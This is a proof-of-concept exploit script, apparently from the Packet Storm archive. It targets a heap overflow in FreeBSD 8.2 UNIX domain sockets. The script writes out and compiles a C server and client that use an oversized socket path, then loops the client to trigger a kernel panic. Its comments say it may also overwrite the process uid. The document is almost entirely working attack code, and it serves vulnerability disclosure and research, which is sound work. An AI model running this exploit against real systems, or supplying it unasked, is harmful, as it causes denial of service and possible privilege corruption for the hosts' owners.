FreeBSD UIPC socket heap overflow proof of concept exploit that causes a kernel panic. Tested on FreeBSD 8.2-RELEASE.
392d5e1fab7ef40059a4391fcc8e1c05b6f410d6413606f432dc4a27dfea91ba#!/bin/sh
#
# fbsd-uipcsock-heap.sh, by Shaun Colley <scolley@ioactive.com>, 29/09/11
#
# proof-of-concept crash for the freebsd unix domain sockets heap
# overflow. this was tested on freebsd 8.2-RELEASE. just a PoC for now.
#
# see advisory & patches for details:
# http://www.securityfocus.com/archive/1/519864/30/0/threaded
#
# this PoC will usually result in a kernel panic with a read access
# violation at 0x616161XX but sometimes the kernel will not crash straight
# away (particularly if you shorten the length of 'sun_path' -- try 140 bytes),
# and your uid (see output of `id`) may have been modified to the
# decimal equivalent of 0x61616161 during the heap smash
# write server code to srv.c
cat > srv.c << _EOF
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <unistd.h>
#include <string.h>
struct socky {
short sun_family;
char sun_path[160];
};
int connhandler(int incoming)
{
char buffer[256];
int n = 0;
n = read(incoming, buffer, 256);
buffer[n] = 0;
printf("%s\n", buffer);
n = sprintf(buffer, "fbsd uipc socket heap overflow");
write(incoming, buffer, n);
close(incoming);
return 0;
}
int main(void)
{
struct socky overfl0w;
int sock, incoming;
socklen_t alen;
pid_t child;
char buf[160];
sock = socket(PF_UNIX, SOCK_STREAM, 0);
if(sock < 0)
{
printf("socket() failed!\n");
return 1;
}
memset(&overfl0w, 0, sizeof(struct socky));
overfl0w.sun_family = AF_UNIX;
memset(buf, 0x61, sizeof(buf));
buf[sizeof(buf)-1] = 0x00;
strcpy(overfl0w.sun_path, buf);
if(bind(sock, (struct sockaddr *)&overfl0w,
sizeof(struct socky)) != 0)
{
printf("bind() failed!\n");
return 1;
}
if(listen(sock, 5) != 0)
{
printf("listen() failed!\n");
return 1;
}
while((incoming = accept(sock, (struct sockaddr *)&overfl0w, &alen)) > -1)
{
child = fork();
if(child == 0)
{
return connhandler(incoming);
}
close(incoming);
}
close(sock);
return 0;
}
_EOF
gcc srv.c -o srv
# write the client code to client.c
cat > client.c << _EOF
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <string.h>
struct socky {
short sun_family;
char sun_path[160];
};
int main(void)
{
struct socky overfl0w;
int sock, n;
char buffer[256], buf[160];
sock = socket(PF_UNIX, SOCK_STREAM, 0);
if(sock < 0)
{
printf("socket() failed!\n");
return 1;
}
/* start with a clean address structure */
memset(&overfl0w, 0, sizeof(struct sockaddr_un));
overfl0w.sun_family = AF_UNIX;
memset(buf, 0x61, sizeof(buf));
buf[sizeof(buf)-1] = 0x00;
strcpy(overfl0w.sun_path, buf);
if(connect(sock,
(struct sockaddr *)&overfl0w,
sizeof(struct socky)) != 0)
{
printf("connect() failed!\n");
return 1;
}
n = snprintf(buffer, 256, "panic");
write(sock, buffer, n);
n = read(sock, buffer, 256);
buffer[n] = 0;
printf("%s\n", buffer);
close(sock);
return 0;
}
_EOF
gcc client.c -o client
# crash doesn't happen straight away, so loop the client to speed it up
cat > loop.c << _EOF
#include <stdio.h>
int main() {
for(int i = 0; i < 1000; i++) {
system("./client");
}
}
_EOF
gcc loop.c -o loop
./srv &
./loop
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed